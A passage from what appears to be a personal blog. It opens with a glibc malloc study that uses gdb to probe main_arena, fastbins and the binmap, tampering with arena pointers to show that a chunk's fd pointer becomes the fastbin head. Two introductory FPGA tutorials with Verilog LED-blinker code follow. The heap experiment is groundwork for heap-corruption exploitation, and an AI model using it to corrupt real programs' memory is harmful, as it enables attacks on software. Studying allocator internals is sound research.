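These are pretty self documenting, with one gotcha: FASTCHUNKS_BIT is inverted, so have_fastchunks is true when the bit is clear and set_fastchunks clears it.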

fastbinsY - the fastbin array itself; each entry is the head pointer of a singly linked list of free chunks of one size, which gives a common starting point for running down the fastbin structure. As I may have mentioned before fastbins are arranged by size, so what we have here is essentially a kind of minimalist priority heap.
mchunkptr top - pointer to the top chunk on the heap.
skipping last_remainder for now
mchunkptr bins - the array holding the head pointers of the normal bins. All free chunks that are above fastbin max size will have pointers here, and the first pair of entries is the unsorted bin according to documentation.

unsigned int binmap - a bitmap with one bit per bin, indicating whether that bin may currently hold chunks. We can see how it's used in the do_check_malloc_state function which is thrown in to the source for the sake of aiding debugging:

#define mark_bin(m, i) ((m)->binmap[idx2block (i)] |= idx2bit (i))
#define unmark_bin(m, i) ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
#define get_binmap(m, i) ((m)->binmap[idx2block (i)] & idx2bit (i))

...

static void
do_check_malloc_state (mstate av)
{
  int i;
  mchunkptr p;
  mchunkptr q;

  ...

      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
      if (i >= 2)
        {
          unsigned int binbit = get_binmap (av, i);
          int empty = last (b) == b;
          if (!binbit)
            assert (empty);
          else if (!empty)
            assert (binbit);

So it uses this to extract a "binbit" for each bin and asserts that the bit agrees with whether the bin is actually empty or not. Anyway that's enough about the fields, let's see them in action.
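If the idx2block / idx2bit business feels a bit abstract, here is a small sketch of the same bookkeeping. The constants (128 bins, 32 bits per map word) are my reading of the glibc 2.23 source and should be treated as assumptions for your own build; the Python function names simply mirror the C macros quoted above.

```python
BINMAPSHIFT = 5
BITSPERMAP = 1 << BINMAPSHIFT        # 32 bins tracked per unsigned int
NBINS = 128                          # assumed number of bins
BINMAPSIZE = NBINS // BITSPERMAP     # 4 words in the binmap array


def idx2block(i):
    """Which word of the binmap array holds the bit for bin i."""
    return i >> BINMAPSHIFT


def idx2bit(i):
    """Which bit inside that word belongs to bin i."""
    return 1 << (i & (BITSPERMAP - 1))


def mark_bin(binmap, i):
    binmap[idx2block(i)] |= idx2bit(i)


def unmark_bin(binmap, i):
    # mask to 32 bits so the words behave like C unsigned ints
    binmap[idx2block(i)] &= ~idx2bit(i) & 0xFFFFFFFF


def get_binmap(binmap, i):
    return binmap[idx2block(i)] & idx2bit(i)


binmap = [0] * BINMAPSIZE
mark_bin(binmap, 70)                 # bin 70 lives in word 2, bit 6
print([hex(word) for word in binmap])
```

So checking whether a bin is worth looking at costs one shift, one mask and one AND, which is the whole point of keeping the bitmap around.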

Exploring the main_arena with gdb

To explore the main_arena I whipped up a simple C program that allocates some chunks in series according to a size I specify on the command line.

> cat arena.c

#include <stdio.h>   /* needed for printf */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>

/* allocate one chunk, then trap into the debugger (x86 breakpoint) */
char *make_string(size_t length){
    char *arr = (char *) malloc(length);
    asm("int $3");
    return arr;
}
/* free one chunk, then trap into the debugger */
void free_string(char *arr){
    free(arr);
    asm("int $3");
    return;
}
/*
Generate chunks in a list with a single size
- shows us how fast chunks work
(note: the chunks pointer array itself is never freed)
*/
void make_chunk_field(size_t chunk_length,size_t amount_of_chunks){
    int index = 0;
    char **chunks = malloc(amount_of_chunks*sizeof(char *));
    //printf("[*] chunk array head at [%p]\n",&chunks);

    /* allocate every chunk and fill it with a recognisable byte */
    for (index = 0;index < amount_of_chunks; index++){
        chunks[index] = make_string(chunk_length);
        memset(chunks[index],0x40+index,chunk_length);
    }
    /* overwrite and free them again, in the same order */
    for (index = 0; index < amount_of_chunks;index++){
        memset(chunks[index],0xFF,chunk_length);
        free_string(chunks[index]);
    }
}

int main(int argc, char **argv){
    if (argc < 4){
        printf("Usage : %s [chunk length (bytes)] [number of chunks] [rounds]\n",argv[0]);
        return 2;
    }
    size_t chunk_length = atoi(argv[1]);
    unsigned int number_of_chunks = atoi(argv[2]);
    int cycles = atoi(argv[3]);
    int index = 0;
    for (index =0;index<cycles;index++){
        make_chunk_field(chunk_length,number_of_chunks);
    }
    return 0;
}

I then ran this in gdb and set up a gdbinit to dump the main_arena. Simple gdbinit file:

> cat ~/.gdbinit
define hook-stop
x/16xg 0x603000
x/18xg &main_arena
info threads
end

I also dump what is usually the start of the heap at 0x603000 when I'm launching in gdb, and some thread information. First thing I wanted to know was where each fastbin size goes, by practical demonstration. The basic procedure was:

Assign a bunch of chunks of a given size
free up all of them
at each free, check the main_arena fastbinsY array contents

We of course need to know where fastbinsY starts, which with gdb and glibc is pretty easy; all you need to do is run it, set some break point and issue this command:

(gdb) x/1xg &main_arena->fastbinsY

0x7ffff7dd1b28 <main_arena+8>: 0x0000000000000000

Pretty much the same as far as the other fields go if you're curious enough. Okay so we know where the fastbinsY starts. Let's see what happens when we increase chunk size by 10 bytes every time, basically I just ran arena.c like this:

The r 10 5 1 here means, run this with chunks of size 10 bytes, allocate an array of 5 chunks, and allocate and then deallocate them for 1 round. And after collecting enough data for size of chunks 10,20,30... until the fastbinsY is no longer used I saw this:

So clearly as soon as a request is bigger than 120 bytes on my machine its chunks stop going to the fastbins and start landing in the unsorted bin instead. We can see this when we do a request for 130 byte chunks:
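The 120 byte cut-off isn't magic, it falls out of how malloc pads a request up to a chunk size. Below is a rough sketch of that arithmetic for a 64-bit glibc 2.23 style allocator. The constants (8 byte size field, 16 byte alignment, 32 byte minimum chunk, 128 byte default fastbin limit) are assumptions based on my reading of malloc.c, and fastbin_for_request is a helper name I made up for this example.

```python
SIZE_SZ = 8                              # size of the chunk size field (64-bit)
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1      # chunks are 16 byte aligned
MINSIZE = 32                             # smallest chunk malloc will hand out
MAX_FAST = 128                           # assumed default fastbin size limit


def request2size(request):
    """Pad a malloc() request up to the real chunk size."""
    padded = request + SIZE_SZ + MALLOC_ALIGN_MASK
    if padded < MINSIZE:
        return MINSIZE
    return padded & ~MALLOC_ALIGN_MASK


def fastbin_index(chunk_size):
    """Index into fastbinsY for a chunk of this size (64-bit layout)."""
    return (chunk_size >> 4) - 2


def fastbin_for_request(request):
    """Return the fastbinsY index a freed chunk lands in, or None if too big."""
    size = request2size(request)
    if size <= MAX_FAST:
        return fastbin_index(size)
    return None


for request in range(10, 140, 10):
    print(request, request2size(request), fastbin_for_request(request))
```

Under these assumptions a 120 byte request becomes a 128 byte chunk, which is the last size that still fits in a fastbin, while a 130 byte request becomes a 144 byte chunk and falls through.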

So what happens if you try to change main arena fields while the heap is in use or while the program is running? Let's see:

Glibc will panic when you mess with the main_arena, but the error is interesting here: it's not about the main_arena, it's about the fastchunk. Which means some legitimate fastchunk stuff probably happened with the corrupted data? We can see what is happening here with another experiment, by looking at which field in the fastchunk actually ends up in the main_arena by doing the following:

The screenshot above was produced by running the alloc/dealloc for 2 rounds, what I did was:

assigned some chunks to prep the heap (all the same size, running the same arena.c quoted above)
then re-assigned them
and while in flight I tinkered with the main_arena pointers.

After injecting a sample pointer we can see that the 0x434343 value gets pop'd into the main arena at the end of the error dump:

Pretty interesting! The field that gets pop'd out is none other than the mchunk->fd pointer, which would normally point to the next free chunk in the same fastbin. So we now know that when a chunk is allocated out of a fastbin, the fastbin head in main_arena is replaced with that chunk's fd pointer. Right now I can't really see a useful way to abuse this, it just opens up some behavior that may be useful later.
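To convince myself of that behavior it helps to model a single fastbin as the last-in-first-out linked list it is. This is only a toy sketch: Chunk and FastBin are hypothetical names, there are no size checks or double-free checks like the real allocator has, and the 0x434343 value simply stands in for the pointer injected in the experiment above.

```python
class Chunk:
    def __init__(self, name):
        self.name = name
        self.fd = None       # forward pointer, only meaningful while free


class FastBin:
    """One slot of main_arena.fastbinsY, modelled as a LIFO list head."""

    def __init__(self):
        self.head = None

    def free(self, chunk):
        # the freed chunk remembers the old head, then becomes the new head
        chunk.fd = self.head
        self.head = chunk

    def malloc(self):
        # hand out the head and promote whatever its fd points to
        victim = self.head
        if victim is not None:
            self.head = victim.fd
        return victim


fastbin = FastBin()
a, b = Chunk("a"), Chunk("b")
fastbin.free(a)
fastbin.free(b)              # list is now b -> a

b.fd = 0x434343              # tamper with the free chunk's fd pointer
fastbin.malloc()             # returns b ...
print(hex(fastbin.head))     # ... and the tampered value is now the bin head
```

The tampered fd value ends up sitting in the arena's fastbin slot, which matches what the error dump showed.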

That's going to be it for this one, next post is going to cover some stuff about the heap life cycle, which methods actually get called when the heap sets up and tears down behind the scenes.

[FPGAs] Introduction to the ICEStick40

2019-03-06T18:19:00.002-08:00

FPGAs are arguably the best way to get into hardware reverse engineering for many reasons. The most obvious one according to me is the experience in what I've come to term "raw clockiness" (or the practice of making a real hardware backed clock do exactly what you want). There is a certain romanticism of freshly broken set theory and deep repressed proof theory sins that comes to bear for me when I'm exposed to this kind of computing. All other kinds tend to veil this shaky, sometimes deeply COUNTER intuitive means of problem solving :)

Basically what I mean to say here is that if you can get over the hurdle with FPGAs (which is not a big deal at all if you know basic set theory) you've mastered many things that repeatedly form the base of the problems you'll need to solve in reverse engineering hardware questions like:

What is this thing doing with that oscillator? What on earth can it possibly be doing? There are only so many combinatoric things that can happen based on the context and components / traces handling a signal or input - the more experience you have with raw signal programming the better you get to know these limitations and nuances. They are the most important rules of the game a lot of the time.
Which one of these input/output signals is the clock / data etc etc based on what components are doing with it in context? Like an argument to a function in assembly you are trying to type based on its place in other functions and contexts.
How does this thing receive its programming or settings? from where? how often? FPGAs are often volatile, they don't "store" their programming forever; the chip is constantly reprogrammed for use, and programming is usually done via a micro-controller or anything that can squawk some bit stream into the chip really.
OMG is that an FPGA on the board? Sometimes things you are trying to identify can literally just straight up be FPGAs hehe

Anyway enough philosophical waxing (jokes everything is a kind of soft philosophy to me now); let's get into a quick example with the ICEStick. The reason I really really like this project is because it's completely open source, you can get the ICEStick for super cheap on amazon and various other places; so it's super easy to get started! All you need to do is download a couple things, write a Makefile and start pumping out bit streams that do the awesome things. In this post I'll cover all you need to do, to get that going.

Basic Workflow

Here are the basic steps:

Write some Verilog modules (*.v files) - obviously any text editor will do but vi(m) is always the best choice.
Define a constraints file for your board (*.pcf files) - this tells the other tools where to find which component when placing and routing. You only need to do this once, depending on which components you're using on which board.
Synthesize the modules into a netlist (*.blif files) - for this we will use yosys
Produce some place n' route files (*.txt files) - our place n route tool here will be arachne-pnr (pnr stands for "place n route"); icepack then packs its output into the final bitstream (*.bin files)
Program/flash the FPGA board with iceprog

Preparing the Environment

You need to grab a couple tools to get this all set up (most of the posts I link below mention other steps for various platforms); for this one I'm sticking to a simple Ubuntu 18 LTS machine with nothing fancy installed except git. All you need to do is download a couple repositories and make + install them.

install / make dependencies
install / make yosys, arachne-pnr, iceprog
Test build

I've whipped up a simple script that does all this for you, available on gist:

All you need to do is run this and it should sort everything. Could take a couple minutes.
Once that's all done, make yourself a test folder and stick this convenient Makefile in there:

To use the Makefile you simply do the following:

Replace the VER variable with the name of the Verilog module you'd like to synthesize.
make (make everything).
make prog (program the most recent bitstream).

Last thing you need to do, before writing some Verilog; is define a constraints file (*.pcf). You might notice that the tools we use here are not specifically for a particular board, they support a range of them. In order to make sure (when you synthesize a bitstream) that you're targeting the right board - you need to state some configurations for IOPins, clocks and other goodies you'd like the FPGA to interact with on the board, here's what the ICEStick40's .pcf file looks like:

LED Blinker with ICEStick40

Once you've got everything up and running, you'll be able to whip up a simple LED Blinker like so:

Good thing here is that this works pretty much like any other LED blink counter, it just maps some reg's to the LEDs, and flips them on and off using a clock pre-scaler that reduces it to 1Hz (using a 21 bit reg array). If you're confused about these words its totally cool, I have some blog posts on the way that explain how they work in full. For now just make sure you can get your environment working, making sure you understand the code is a workable problem, but only if you can actually hit the FPGA with the right stuff.

If you compile this using my Makefile (or not), you should see something like the following output (luckily because yosys and the pnr tools are pretty verbose, you will be able to trace quite a bit of activity if things are going funky):

Last step is actually programming the FPGA with the bitstream we just generated, here's what the output is meant to look like:

>sudo make prog
iceprog example.bin
init..
cdone: high
reset..
cdone: low
flash ID: 0x20 0xBA 0x16 0x10 0x00 0x00 0x23 0x64 0x34 0x65 0x04 0x00 0x22 0x00 0x32 0x27 0x12 0x16 0xFE 0x6A
file size: 32220
erase 64kB sector at 0x000000..
programming..
reading..
VERIFY OK
cdone: high
Bye.

That's it for this one folks.

References and Reading

https://appcodelabs.com/getting-started-with-lattice-icestick-using-open-source-tools-on-macos-linux
Various ICEStick posts from hackaday https://hackaday.com/tag/icestick/
http://www.clifford.at/icestorm/

[FPGAs] (Introduction to FPGAs) :: an LED Blinker with Mojo v3

2019-01-28T16:50:00.001-08:00

Wiring my board up to an LCD screen on top of a copy of Hegel's Aesthetics.

Hi folks, in this post I'm going to give you as gentle an introduction to FPGA (I will unpack the acronym later) programming as possible, hopefully explaining as much as I know (which is very little up to this point, but enough to, I guess, help some folks), while providing lots of examples and challenges for folks who need ideas to try out that are easy enough to get a foothold.

If you're familiar with any programming you should have enough to get going in Verilog it just requires a bit of re-orientation and practice - just like any language basically ;)

To start let's think about what we are going to do here, FPGAs are pieces of hardware that we can configure. That configuration is done by taking the language we speak (which is the English/Human-Language equivalent, Verilog) and converting it into that configuration for the FPGA; this configuration is called a bit stream. A bit stream is essentially the final product of "synthesizing"; it's kind of like putting together a little song for the chip that the computer tweets over lovingly, lulling it into total subservience.

There are many different kinds of FPGAs so you can play little songs to many different kinds of chips, the tunes are ever wilder, faster and more exciting the more powerful the chips get - I've only programmed like one so far. But have a shop around, there are tons of boards and kits out there that aren't that expensive, some of them are open source as well! I'm going to use the Mojo v3 in this post though (purely because it's a well documented board, there's a book out on it as well); I thought it would be an easy way to start. I will definitely cover more open source FPGA tech as well in future :P.

Mojo V3 in a super hipster instagram filter

What are FPGAs

FPGAs (Field Programmable Gate Arrays - see told'cha) are essentially a very very small grid of (usually thousands) of configurable circuits. FPGAs provide a way to describe combinations of these small configurable circuits that are provably analogous (intended to work exactly the same as) some hardware description language.

To configure the circuitry I mentioned, you essentially tell the FPGA what to tell its different components. This list might be a ton of information but its not super crucial you understand it, you can program a board fine without knowing any of this, its just good to know about it so you can be a little more aware of what you're doing.

The different components of an FPGA are the following (some manufacturers may differ in many ways):

Programmable Interconnects (Points) (PIPs) : These are (according to my sources [2]) basically blocks of circuitry that allow you to route signals between CLBs.

Configurable Logic Blocks (CLBs) : This component of the FPGA is where most of the magic happens, the more CLBs an FPGA has the more data it can store and process essentially. The CLBs have a couple of components to them:

Flip Flops : these are for responding to clocked events and storing data (I will explain how this happens later). You will essentially orientate your programming to leverage these Flip Flops to modify information in response to clock events (when the clock signal goes from high to low or vice versa). This I think is why they are called "flip flops", because they allow you to flip flop along with the clock lol.
Internal RAM: for configuring Look up tables (LUTs), these are basically just switch statements of a certain kind, they hold configurations for the logic components[2] inside the CLB.
Multiplexers : These essentially take in multiple input signals and switch one of them through to a single output, or as one post puts it:

The multiplexer, shortened to “MUX” or “MPX”, is a combinational logic circuit designed to switch one of several input lines through to a single common output line by the application of a control signal. [6]

Configurable I/O Blocks (IO Blocks) : These are basically input/output points (or if you like ports), that allow you to tap signals into the FPGA, or push out signals from the FPGA. A simple example would be turning on an LED, you will need some place to stick the LED 'into' to make it turn on, the I/O block is where this signal for the LED will get fed from. Please don't stick LEDs directly into your I/O ports on your boards I'm just making an analogy - I will most likely cover a simple external LED tutorial as well, because its pretty vital in the journey to more complex external stuff ;). The I/O blocks have components to them as well, these essentially allow you to respond to the signal when it makes a certain transition or takes a certain state.

The high or low state of the signal is called the logic level. If we tell a circuit to respond to an event when an input signal is high, the input is referred to as active high. When we tell it to respond when an input signal is low, guess what, it's called active low!

Check out [2] in the Reading and References section for cool pictures about it.
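If the "LUTs are just switch statements" line and the multiplexer quote above are hard to picture, here is a tiny software sketch of both ideas. It isn't how any particular vendor's CLB is wired up; make_lut and mux are names I made up, and the truth tables are just example configurations.

```python
def make_lut(truth_table):
    """Build an n-input look up table; truth_table[i] is the output for
    the input pattern whose bits spell out the number i (input 0 = bit 0)."""
    def lut(*inputs):
        index = 0
        for position, bit in enumerate(inputs):
            index |= (bit & 1) << position
        return truth_table[index]
    return lut


def mux(inputs, select):
    """Switch one of several input lines through to a single output."""
    return inputs[select]


# "configuring" the same piece of hardware as two different gates
xor_gate = make_lut([0, 1, 1, 0])
and_gate = make_lut([0, 0, 0, 1])

print(xor_gate(1, 0), and_gate(1, 0))    # inputs a=1, b=0
print(mux([0, 1, 1, 0], select=2))       # pass input line 2 through
```

The point to take away is that the "logic" is really just stored configuration bits, which is exactly what the bit stream ends up filling in.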

Anyway it's basically like play dough for hackers and electrical engineers. They aren't hard to get your head around but they can be very very useful when you do! I think getting over the FPGA hill is a very important step in your career as a hacker (just my opinion let's say).

What you will need

DISCLAIMER: The current tutorial involves giving your address to the Xilinx folks (I think this is because of US Export laws) which is pretty crappy not for any other reason than its private information and it can be mistreated, lost or stolen. So if you're not up for that, please just follow along for interests sake I promise I will provide fully open source no address information bribery required - tutorials as well.

But, if you're okay with the Xilinx folks knowing where you live and that you're learning the dangerous sorcery of FPGA hardware - please go download the Xilinx ISE below.

Mojo V3 Board available at amazon[10], SparkFun[9], Alchitry [8] and I'm sure a ton of other places.
Xilinx ISE available at https://www.xilinx.com/ (Sign up for an account and download the ISE)
USB 3.0 to Micro-B cable
Mojo Loader (for loading your program onto the board)
Mojo IDE (provides a different interface for verilog programing, simpler but less specific than the ISE verilog IDE) Mojo IDE also comes with its own programming variant called Lucid: https://alchitry.com/pages/lucid

You will need to install the ISE on whichever platform you like (I suggest using Linux based ones, it's just way easier and doesn't require a ton of driver drama). For more information on how to get that going please see the following example: https://alchitry.com/pages/installing-ise .

Verilog Crash Course

I'm going to be doing this tutorial in Verilog; realizing this can be a bit of an obscure language (I agree it is obscure - but for no super hard to understand reason to be honest) you might need a bit of a jump start into it if you've not ever done it before, but don't fret the whole point of this blog post is to try to explain this to someone who's never done it before.

Let's get to it, Verilog is a hardware description language; we say Verilog works at the register-transfer level (or that it's an RTL language). This wording is meant to describe what Verilog targets with its abstraction, essentially the transfer of signals between hardware level registers (and other components) [11,12,13,14]. Anyway once you have everything installed according to the tutorials above; you can then start scripting some Verilog for the Mojo.

Here's what a bare bones Verilog script looks like:

module hello_verilog(input clk, output reg external_led);

  always @ (posedge clk) begin
    external_led <= clk ^ external_led;
  end

endmodule

This is just an example Verilog script to show how elements of the language work, it probably won't achieve anything profound if it were implemented as a real Verilog module on an actual FPGA though (this is because of the frequency of the clock - more on this later). And the reason is something that I need to cover before I can show you a real Verilog script.

Anyway, before we unpack that; lets take a look at this script and explain each part.

module hello_verilog(input clk, output reg external_led);
...
endmodule

This is the module header; it declares the inputs and outputs of the module being defined here. Also it obviously needs to have a declared endmodule as well.

These inputs and outputs (and I'm no deep expert here) can essentially be driven by the I/O blocks - depending on what you feed the module as inputs. So if you want to drive in some external module with pins the FPGA board needs to talk to (like a logic analyzer or oscilloscope) - these input / output declarations are what you designate them as.

The next section of code I want to get around is this:

always @ (posedge clk) begin
...
end

This is an always section of Verilog code, it defines actions that happen "in tune" with certain changes of the signals named in the sensitivity list in the brackets. When the clock "clk" (which is for all intents and purposes a square wave - see the example further down) registers a change from a 0 to a 1 value this is called a positive edge, or posedge in Verilog (the other one is called a negedge or negative edge).

So it essentially says in summary, when the clock changes from 0 to 1 always do this stuff. And it closes with an end token of course.

Next we have the assignment operation inside the always block:

external_led <= clk ^ external_led;

This is called a non-blocking assignment[14]. This kind of assignment means if there are any assignments after it or before it (of this same kind "<="), they will all be assigned in parallel (see [14] for an excellent explanation of the different pitfalls and always block politics as well). It's kind of like attaching connectors to things from a source, if they are in parallel the electricity can be expected to be seen running down each connector at the same time. The assignment gives external_led the value of clk xor'd with the current value of external_led. If you think it through, you'll see that this is a way to make it flip on and off, not so? A good exercise is to try and write out the values.
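If you'd rather let a computer write out the values, here is a minimal software sketch of that always block. It walks over a list of clock samples, spots each 0 to 1 transition and applies the same xor. The function name run_always_posedge is made up, the LED is assumed to start at 0, and this ignores everything real hardware cares about (timing, reset, unknown initial state).

```python
def run_always_posedge(clk_samples, external_led=0):
    """Replay `always @ (posedge clk) external_led <= clk ^ external_led;`
    over a list of 0/1 clock samples and return the LED value after each one."""
    history = []
    previous = clk_samples[0]
    for clk in clk_samples[1:]:
        if previous == 0 and clk == 1:           # this is the posedge
            external_led = clk ^ external_led    # clk is 1 here, so this toggles
        history.append(external_led)
        previous = clk
    return history


clock = [0, 1, 0, 1, 0, 1, 0]
print(run_always_posedge(clock))
```

Because clk is always 1 at the moment of a positive edge, the xor boils down to "invert external_led on every rising edge", so the LED changes at half the clock's frequency.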

Okay so I mentioned this is a non-blocking assignment, does that mean there is another kind? YES! Guess what its called a blocking assignment! Here's what it looks like:

// syntax [left operand] "=" [right operand]
external_led = clk ^ external_led;

A dead plain "=" symbol is used. The way to remember this lies in understanding the header of an always where this assignment is allowed, here's a blocking always block:

always @ (*) begin
external_led = clk ^ external_led;
end

These always blocks are for designing combinatorial logic circuits or logic gates (literally AND, OR, XOR etc gates); they are great if you need to get really really low level, as in as basic an implementation of digital logic as you'd like on the FPGA.

To summarize:

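blocking = assignments are for combinatorial logic : logic gates, where the statements inside the block are evaluated in order, each one seeing the result of the one before it.
non-blocking <= assignments are for sequential logic : registers, where every right hand side is sampled at the clock edge and all the updates land together, so values move along in a sequence from one clock edge to the next.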

Anyway what I'm trying to say is blocking always blocks are for combinatorial logic, non-blocking always blocks are for sequential logic or building registers - these are things that store information for us, we can chain them up in "sequences" and do useful things like building finite state machines! The reason I'm going with a non-blocking always block in the example, and will most probably go with it in the real example too - is because the on board LEDs on the Mojo are declared as reg's in Verilog - and we will modulate our clock speed using regs too! You will run into a fair amount of frustration with this concept anyway - so just get used to wading out your problems with it, I don't think it's a completely avoidable mistake hehe.
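The classic way to feel the difference between the two assignment kinds is to try swapping two values. The sketch below imitates both behaviours in plain software: the non-blocking version samples every right hand side first and then updates everything together, the blocking version runs the statements one after the other. The function names are made up for this example and this is an analogy, not a Verilog simulator.

```python
def nonblocking_swap(a, b):
    """Imitates:  a <= b;  b <= a;  inside one clocked always block."""
    next_a = b           # every right hand side is sampled first ...
    next_b = a
    return next_a, next_b    # ... then all updates land together


def blocking_swap(a, b):
    """Imitates:  a = b;  b = a;  executed strictly in order."""
    a = b                # a is overwritten immediately
    b = a                # so b just reads back the new a
    return a, b


print(nonblocking_swap(0, 1))    # the two values trade places
print(blocking_swap(0, 1))       # the original a is lost
```

This is why shift registers and other chains of flip flops are written with "<=": each stage picks up what the previous stage held before the clock edge, not what it was just given.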

You probably want to pick up a book on assignment operations, and constraints and practice them a bit (I've tried to be as verbose as possible). This is because one can immediately tell that this imposes major drama on which types are assignable to which types i.e. can you assign reg to wire? Its basically due to how it resolves different types to the board components and combinations of them mentioned above - if you give it something that works sequentially or is meant for non-storage options it can cause antagonisms that are annoying. So be careful and try out stuff a lot, write some bad Verilog so you know what it looks like lol.

Okay so that's pretty bare bones Verilog, you will probably be able to develop "valid" Verilog using this but to be able to compute on real things, real clocks and achieve actual interaction with real "hardware" you're going to need to learn how to divide the clock!

Clock Divider Circuits and Blinking LEDs

I like starting with this because it will be an integral part of a lot of Verilog problems and problem solving strategies. We will most probably be sampling from a certain module at a given rate, clocking in data at given rates; you might need to run multiple different things at multiple different clock frequencies or be required to by certain protocols. So you shouldn't think of a clock as a single rhythm to dance your circuit to, instead see it as something consisting of beats you can skip, group together or chop up any way you need (within physical bounds of course) - multiple loving tweets at different frequencies :)

Here's a simple clock divider circuit in Verilog, this essentially drives one of the Mojo v3 board's on board LEDs (led[7]) to follow a clock that flips on and off at a small fraction of the board's natural clock frequency (bit 20 of the counter toggles at 50 MHz / 2^21, roughly 24 Hz):

module mojo_top( /*module declaration*/
    input clk, //clock input @ 50 MHz (according to ucf file)
    input rst_n, //reset input (active low)
    output [7:0]led //array of LEDs on the Mojo Board
    );

wire rst = ~rst_n; // make reset active high (not used yet)
reg [25:0] clk_div; //declare 26 bits worth of D-FlipFlop "storage"
assign led[6:0] = 7'bz; //leave LEDs 6 down to 0 undriven, i.e. "off"
assign led[7] = clk_div[20]; //assign bit 20 of clk_div to led 7

always @ (posedge clk) begin //declare always block
    clk_div <= clk_div + 1; //add one to the 26 bit counter
end
endmodule

And the user constraints file looks like this:

NET "clk" TNM_NET = clk;
TIMESPEC TS_clk = PERIOD "clk" 50 MHz HIGH 50%;

# PlanAhead Generated physical constraints
NET "clk" LOC = P56 | IOSTANDARD = LVTTL; //clock signal
NET "rst_n" LOC = P38 | IOSTANDARD = LVTTL; //reset button
NET "led<0>" LOC = P134 | IOSTANDARD = LVTTL; //on board led 1
NET "led<1>" LOC = P133 | IOSTANDARD = LVTTL; //on board led 2
NET "led<2>" LOC = P132 | IOSTANDARD = LVTTL; //and so forth...
NET "led<3>" LOC = P131 | IOSTANDARD = LVTTL;
NET "led<4>" LOC = P127 | IOSTANDARD = LVTTL;
NET "led<5>" LOC = P126 | IOSTANDARD = LVTTL;
NET "led<6>" LOC = P124 | IOSTANDARD = LVTTL;
NET "led<7>" LOC = P123 | IOSTANDARD = LVTTL;
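As a quick sanity check on the divider above, it's worth working out how fast a given bit of a free running counter actually toggles. Bit n of a counter clocked at f completes one full on/off cycle every 2^(n+1) clock ticks, so its frequency is f / 2^(n+1). The sketch below does that arithmetic for the 50 MHz clock from the constraints file and also steps a small counter by hand; the function names are made up for this example.

```python
def bit_frequency_hz(clock_hz, bit_index):
    """Frequency of one bit of a counter that increments on every clock edge."""
    return clock_hz / (2 ** (bit_index + 1))


def simulate_divider(cycles, bit_index, width=26):
    """Step a `width` bit counter and record the chosen bit after each tick."""
    counter = 0
    output = []
    for _ in range(cycles):
        counter = (counter + 1) % (1 << width)   # clk_div <= clk_div + 1
        output.append((counter >> bit_index) & 1)
    return output


print(bit_frequency_hz(50_000_000, 20))   # what led[7] follows in the module above
print(simulate_divider(8, bit_index=1))   # bit 1 changes every 2 ticks
```

Picking a higher bit halves the blink rate each time, so if the LED looks like it's flickering rather than blinking, moving a few bits up the counter is the cheapest fix.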

Lets run through the code a bit. I need to cover this declaration:

reg [25:0] clk_div;

This declares what is called a register (reg), here 26 bits wide. The name doesn't necessarily mean a physical storage element; a reg just keeps a value until you assign it another one. It's also important to remember that sometimes you can string up regs that won't actually make it into the bitstream as flip-flops. Check out this awesome Stack Overflow answer:

> Contrary to their name, regs don't necessarily correspond to
> physical registers. They represent data storage elements in
> Verilog/SystemVerilog. They retain their value till next value is
> assigned to them (not through assign statement). They can be
> synthesized to FF, latch or combinatorial circuit. (They might not be
> synthesizable !!!)

- (extract from: https://stackoverflow.com/questions/33459048/what-is-the-difference-between-reg-and-wire-in-a-verilog-module )

Besides the other declarations and (already covered) always blocks, we see input/output declarations mentioning:

input clk - the input clock signal (pay attention to the User Constraints File to see how this is declared). In our example this is the board's 50 MHz clock; the slowed down version is what we build from it in clk_div.
input rst_n - we don't actually use this just yet, it's the input from the reset button on the Mojo v3 board; this is a great little "toggle" to have around.
output [7:0] led - this is an 8 bit output bus. Since it isn't declared as reg it is a net (wire) by default, which is why we drive it with assign. The User Constraints File maps each port to a pin with lines like NET "rst_n" LOC = P38 | IOSTANDARD = LVTTL, meaning essentially that location P38 on the FPGA should be connected to the net called rst_n.

The net type is essentially the type that allows driving from and to I/O blocks, check out this other awesome Stack Overflow answer:

"The net data types can represent physical connections between structural entities, such as gates. A net shall not store a value (except for the trireg net). Instead, its value shall be determined by the values of its drivers, such as a continuous assignment or a gate."

- https://stackoverflow.com/questions/9975415/what-does-net-stand-for-in-verilog

The other interesting pieces of code here are the assign statements that drive the LED outputs (the internal register we need to store some of the clock flips is clk_div, covered above):

assign led[6:0] = 6'bz;

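This covers the 7 bit positions from number 6 down to 0 and leaves them undriven (z means high impedance, so those LEDs stay off; strictly the literal should be 7 bits wide to match the 7 bit slice). That leaves 1 open, namely the 8th bit (led[7]), which is set as: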

assign led[7] = clk_div[20];

This assignment ties led[7] to bit 20 of the clk_div register. So I declared 26 bits ([25:0]) and I'm taking bit 20 and making led[7] always the same as it. The final piece of the puzzle is in the always block:

clk_div <= clk_div + 1;

This adds 1 to the 26 bit value of clk_div on every rising clock edge. As far as I understand this, it means that clk_div will count up and whenever the number it's at has a "1" in bit position 20, led[7] will turn on.

If you think about how binary numbers add up you can see that this means it will slowly bubble up the bit values, floating the carry up the 26 bit places until it hits bit 20. This is much slower than the raw clock, which flips up and down at 50 MHz, which is like a bajillion times a second; your eyes won't even see the LED move, it's so fast. So we basically tell the counter to add up the clock's flips in a total, and when we are happy with the amount we tell the LED to turn on! I hope that makes it easier to understand! What this means is obviously we can control how fast the LED appears to pulse: we can make it pulse faster and slower, we can even make multiple LEDs on the board pulse at different rates if you want to give yourself a tension headache lol, but it's fun!

8 bit led counter and split counter

It can be a bit hard to find examples, but if you understand how the clk_div trick works then you essentially know how to build a counter already. All you need to do is make a counter for the LEDs. But there's one caveat, and that is again the issue of blinking the LEDs on and off too fast. To solve this we just divide the clock, and then add to the LED counter only when the low 21 bits of clk_div (clk_div[20:0]) have wrapped around to 0. If we then map the counter to the LEDs, job's done!

Here's the Verilog:

module mojo_top( /*module declaration*/
input clk, //clock input @ 50 MHz (according to ucf file)
input rst_n, //reset input
output [7:0]led //array of LEDs on the Mojo Board
);

wire rst = ~rst_n; //make reset active high (needed by the if (rst) below)
reg [25:0] clk_div;
reg [7:0] led_dff;
assign led[7:0] = led_dff[7:0];
always @ (posedge clk) begin
clk_div <= clk_div + 1;
if (clk_div[20:0] == 0) begin
led_dff <= led_dff + 1;
end
if (rst) begin
led_dff <= 0;
end
end
endmodule

You can also split up the counter by making the lower bits "add" up to the high bits like so:

module mojo_top( /*module declaration*/
input clk, //clock input @ 50 MHz (according to ucf file)
input rst_n, //reset input
